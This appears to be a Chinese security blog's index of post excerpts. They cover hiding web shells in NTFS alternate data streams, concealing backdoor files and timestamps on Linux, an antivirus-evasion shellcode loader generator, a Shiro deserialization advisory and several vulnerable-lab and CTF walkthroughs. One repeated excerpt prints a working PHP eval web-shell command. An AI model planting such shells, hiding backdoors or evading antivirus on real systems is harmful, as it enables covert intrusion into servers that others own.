Windows权限维持-隐藏篇
Windows权限维持-隐藏篇 利用ADS隐藏文件内容 在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞: echo ^<?php echo "success";@eval($_POST['R19ht']);?^> > index.php:R19ht.jpg 这样子就生成了一个不可见的shell R19ht.jpg,...
Windows权限维持-隐藏篇 利用ADS隐藏文件内容 在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞: echo ^<?php echo "success";@eval($_POST['R19ht']);?^> > index.php:R19ht.jpg 这样子就生成了一个不可见的shell R19ht.jpg,...
Linux篇-隐藏 隐藏文件 Linux 下创建一个隐藏文件:touch .test.txt 一般的Linux下的隐藏目录使用命令ls -l是查看不出来的,只能查看到文件及文件夹,查看Linux下的隐藏文件需要用到命令:ls -al 隐藏文件时间戳 Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用 touch 就可以了。 比如参考 index.php 的时间,再赋给 ...
免杀生成器 简介 免杀exe版子基于c/c++开发,免杀生成器基于Qt开发。目前能够规避常见杀软的静态查杀 火绒:版本: 5.0.75.1 病毒库: 2023-12-28 18:18 360安全管家: 360杀毒: 使用简介 生成cs的bin格式的shellcode并导入到生成器 自定义加密shellcode(目前只支持CBC),输入iv和key 选择生...
CNVD-2023-96645 一、RCE漏洞 某公司WMS系统存在命令执行漏洞 二、危害等级 高,漏洞评分:10.0 三、漏洞类型 通用型漏洞(产品组件漏洞) 四、漏洞详情 该公司WMS系统中使用了shiro框架,由于其key泄露且可轻易获取而导致的shiro反序列化漏洞,利用该漏洞可实现任意命令执行。
AI-WEB-1 一、环境配置 更改网络适配器为NAT模式 二、主机探测 在物理机中查看VMnet8网卡 使用fscan探测AI-WEB-2靶机ip地址为:192.168.157.137 三、WEB信息收集 dirsearch -u http://192.168.157.137/ dirsearch -u http://192.168.157.137...
DC-1靶机 一、环境配置 更改网络适配器为NAT模式 二、主机探测 在物理机中查看VMnet8网卡 使用fscan探测DC-1靶机ip地址为:192.168.157.133 三、漏洞利用 同时扫描出目标可能存在drupal-cve-2014-3704-sqli,使用msf查看是否有利用模块 msf6 > search cve-2014-3704 ...
AI-WEB-2 一、环境配置 更改网络适配器为NAT模式 二、主机探测 在物理机中查看VMnet8网卡 使用fscan探测AI-WEB-2靶机ip地址为:192.168.157.134 三、WEB信息收集 dirsearch -u http://192.168.157.134/ 存在/webadmin目录,但是需要账号密码 四、任意文件读取 看到有...
WEB-Polar OA 一、查看题目信息 题目给出一个PolarOA统一身份认证系统的登录界面。 二、题目分析 在登录界面尝试登录并抓包查看信息,发现rememberMe的特征字符串,可猜测考察shiro反序列化的利用。 原理:Apache Shiro框架的记住密码功能,用户登录后生成加密编码的cookie。服务端对记住密码产生的cookie进行base64解密,再进行A...
VMWare Horizon 漏洞利用案例 前期测试 漏洞url:VMware Horizon (yghuagong.com) VMWare Horizon 存在 log4j2 CVE-2021-44228 漏洞 手动复现未果,直接当脚本小子上工具吧。有时候打不进去是因为工具不对! 漏洞利用工具:https://github.com/puzzlepeaches/Log4jHoriz...
Spring_Boot_Admins_integrated_notifier_support_SpEL远程代码执行(CVE-2022-46166) 1 漏洞简介 Spring Boot Admin是一个用于管理Spring Boot应用程序的开源管理用户界面,用于监控Spring Boot单机或集群项目,它提供详细的健康信息、内存信息、JVM系统和环境属性、垃圾回收信息、日志设置和查看、...